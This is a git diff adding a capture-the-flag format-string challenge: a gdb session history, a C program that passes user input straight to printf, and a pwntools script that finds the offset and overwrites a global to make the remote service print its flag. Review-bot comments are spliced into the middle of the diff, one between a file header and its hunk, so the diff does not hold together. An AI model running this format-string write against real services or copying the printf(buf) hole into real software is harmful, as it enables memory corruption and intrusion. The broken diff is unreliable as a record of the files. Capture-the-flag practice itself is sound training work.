diff --git a/format_string_2/.gdb_history b/format_string_2/.gdb_history
new file mode 100644
index 0000000..28b50a2
--- /dev/null
+++ b/format_string_2/.gdb_history
@@ -0,0 +1,217 @@
+disassemble main
+b *main+75
+run
+exit
+disams main
+disasm
+disams main
+disasm main
+disassemble main
+b *main+75
+run
+n
+n
+n
+n
+stack
+stack 10
+stack 20
+stack 40
+search 0x21737573
+search \x21\x73\x75\x73
+search -dword 0x21737573
+search --dword 0x21737573
+search --dword 0x00404060
+search --qword 0x0000000000404060
+disassemble main
+stack 40
+stack 60
+search --dword 0x21737573
+run
+continue
+run
+stack 40
+stack 60
+continue
+run
+search --dword 0x21737573
+continue
+run
+continue
+run
+disassemble main
+exit
+disassemble main
+exit
+disassemble main
+b *main+95
+run
+stack 60
+help x
+stack 60
+x 1xg 0x7fffffffbc70
+x 1x 0x7fffffffbc70
+x 0x7fffffffbc70
+x 0x7fffffffbc70
+2x 0x7fffffffbc70
+x2 0x7fffffffbc70
+x 2 0x7fffffffbc70
+x /2 0x7fffffffbc70
+x /1xg 0x7fffffffbc70
+n
+x /1xg 0x7fffffffbc70A
+continue
+continue
+run
+exit
+b *main+95
+run
+x /1xg 0x7fffffffbc70A
+stack
+stack 60
+x /1xg 0x7fffffffbc70
+continue
+run
+stack
+stack 60
+x /1xg 0x7fffffffbc70
+continue
+run
+stack 60
+continue
+exit
+python import sys
+python print(sys.path)
+exit
+exit
+exit
+exit
+exit
+exit
+exit
+exit
+exit
+exit
+disassemble main
+b *main+95
+run
+stack 40
+continue
+disassemble main
+run
+stack 40
+continue
+search b570
+find b570
+run
+stack 40
+continue
+info
+exit
+disassemble main
+b *main+95
+run
+stack 40
+continue
+run
+stack 40
+continue
+run
+n
+stack 40
+exit
+disassemble main
+b *main+95
+run
+n
+x/1x
+x/2xw 0x7fffffffb570
+x/xw 0x7fffffffb570
+x 0x7fffffffb570
+continue
+run
+x 0x7fffffffb570
+n
+x 0x7fffffffb570
+continue
+run
+stack 60
+continue
+run
+stack 60
+n
+continue
+run
+stack 20
+continue
+run
+stack
+stack20
+stack 20
+continue
+run
+stack 20
+continue
+run
+exit
+b *main+95
+run < python print(b"\x60\x40\x40\x00")
+run < python -c "print(b"\x60\x40\x40\x00")"
+run < python3 -c "print(b"\x60\x40\x40\x00")"
+exit
+b *main+95
+run < pipe
+exit
+b *main+95
+run < pipe
+continue
+exit
+b *main+95
+run < pipe
+stack 20
+x 0x404060
+n
+x 0x404060
+exit
+b *main+95
+run
+stack 20
+n
+exit
+exit
+b *main+95
+run
+run < pipe
+x 0x404060
+n
+x 0x404060
+stack 20
+continue
+exit
+b *main+95
+run
+run < pipe
+disassemble main
+x 0x404060
+x 0x7fffffffba00
+x $rip
+x $rip+0x2de7
+x 0x401273+0x2de7
+x 0x401279+0x2de7
+stack 40
+continue
+run
+stack 40
+n
+run < pipe
+stack 20
+continue
+run < pipe
+stack 20
+continue
+run < pipe
+stack 20
+continue
+run < pipe
+stack 20
+exit
diff --git a/format_string_2/peda-session-vuln.txt b/format_string_2/peda-session-vuln.txt
new file mode 100644
index 0000000..fe91fea
--- /dev/null
+++ b/format_string_2/peda-session-vuln.txt
@@ -0,0 +1,2 @@
+break *main+95
+
diff --git a/format_string_2/sol.py b/format_string_2/sol.py
new file mode 100755
index 0000000..60eb32f
--- /dev/null
+++ b/format_string_2/sol.py
@@ -0,0 +1,24 @@
+#!/usr/bin/env python3
+from pwn import *
+
+context.arch = "amd64"
+
+address = "rhea.picoctf.net"
+port = 51393
+conn = remote(address, port)
+
+def send_payload(payload):
+ conn = remote(address, port)
+ log.info(f"payload: {repr(payload)}")
+ conn.sendline(payload)
+ return conn.recvall()
+
+format_string = FmtStr(send_payload)
+offset = format_string.offset
+
+payload = fmtstr_payload(offset, {0x404060: 0x67616c66})
+log.info(payload)
+conn.sendline(payload)
+
+flag = conn.recvall()
+log.success(flag)
diff --git a/format_string_2/vuln b/format_string_2/vuln
new file mode 100755
index 0000000..c73077a
Binary files /dev/null and b/format_string_2/vuln differ
diff --git a/format_string_2/vuln.c b/format_string_2/vuln.c
new file mode 100644
index 0000000..2e2b2c7
--- /dev/null
+++ b/format_string_2/vuln.c
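Review bot: Every call to `send_payload` in sol.py opens a fresh `remote(address, port)` that is never closed, and because the local `conn` shadows the module-level `conn` opened on line 8 the probe tubes are simply dropped, so the automated offset search (FmtStr calls this helper once per probe, as far as I can tell) leaks one socket per probe while the line-8 connection sits idle until the final payload is sent. Use the tube as a context manager so each probe connection is closed, and open the final connection only once the offset is known. The two magic numbers on the `fmtstr_payload` line deserve named constants with a comment: 0x67616c66 is the value vuln.c compares `sus` against, and 0x404060 is presumably the address of `sus` (it is the address examined throughout the gdb history) — worth stating rather than leaving as bare literals.
```python
# … unchanged: shebang, imports, context.arch, address/port …

def send_payload(payload):
    """Run one probe on its own connection and return everything the service printed."""
    log.info(f"payload: {repr(payload)}")
    with remote(address, port) as probe:   # closed on exit: no leaked socket per probe
        probe.sendline(payload)
        return probe.recvall()

format_string = FmtStr(send_payload)
offset = format_string.offset

SUS_ADDR = 0x404060     # presumably &sus in vuln (see gdb history) — confirm against the binary
TARGET_VALUE = 0x67616c66  # the value vuln.c's `if (sus == ...)` expects

conn = remote(address, port)  # opened only now, so it is not idle during the probes
payload = fmtstr_payload(offset, {SUS_ADDR: TARGET_VALUE})
# … unchanged: log.info, sendline, recvall, log.success …
```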
@@ -0,0 +1,35 @@
+#include
+
+int sus = 0x21737573;
+
+int main() {
+ char buf[1024];
+ char flag[64];
+
+
+ printf("You don't have what it takes. Only a true wizard could change my suspicions. What do you have to say?\n");
+ fflush(stdout);
+ scanf("%1024s", buf);
+ printf("Here's your input: ");
+ printf(buf);
+ printf("\n");
+ fflush(stdout);
+
+ if (sus == 0x67616c66) {
+ printf("I have NO clue how you did that, you must be a wizard. Here you go...\n");
+
+ // Read in the flag
+ FILE *fd = fopen("flag.txt", "r");
+ fgets(flag, 64, fd);
+
+ printf("%s", flag);
+ fflush(stdout);
+ }
+ else {
+ printf("sus = 0x%x\n", sus);
+ printf("You can do better!\n");
+ fflush(stdout);
+ }
+
+ return 0;
+}
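Review bot: The `fopen("flag.txt", "r")` result inside the `if (sus == 0x67616c66)` branch is passed straight to `fgets`, so a missing or unreadable flag file makes the program dereference a NULL `FILE *` and crash rather than report the problem, and the stream is never `fclose`d; `fgets` returning NULL also leaves `flag` uninitialized before `printf("%s", flag)`. The variable is a `FILE *`, so naming it `fd` reads like a descriptor — `fp` would be clearer. Separately, `printf(buf)` is the challenge's intended user-controlled format string; a comment such as `// Intentional format-string bug for the challenge: buf is user input` would stop a later maintainer from "fixing" it in response to a -Wformat-security warning. The `#include` line appears empty on this page, probably a rendering artifact that dropped `<stdio.h>`, but worth checking the committed file.
```c
        // Read in the flag
        FILE *fp = fopen("flag.txt", "r");
        if (fp == NULL) {
            perror("flag.txt");
            return 1;
        }
        if (fgets(flag, sizeof flag, fp) == NULL) {
            flag[0] = '\0';
        }
        fclose(fp);
        /* … unchanged: printf("%s", flag) and fflush … */
```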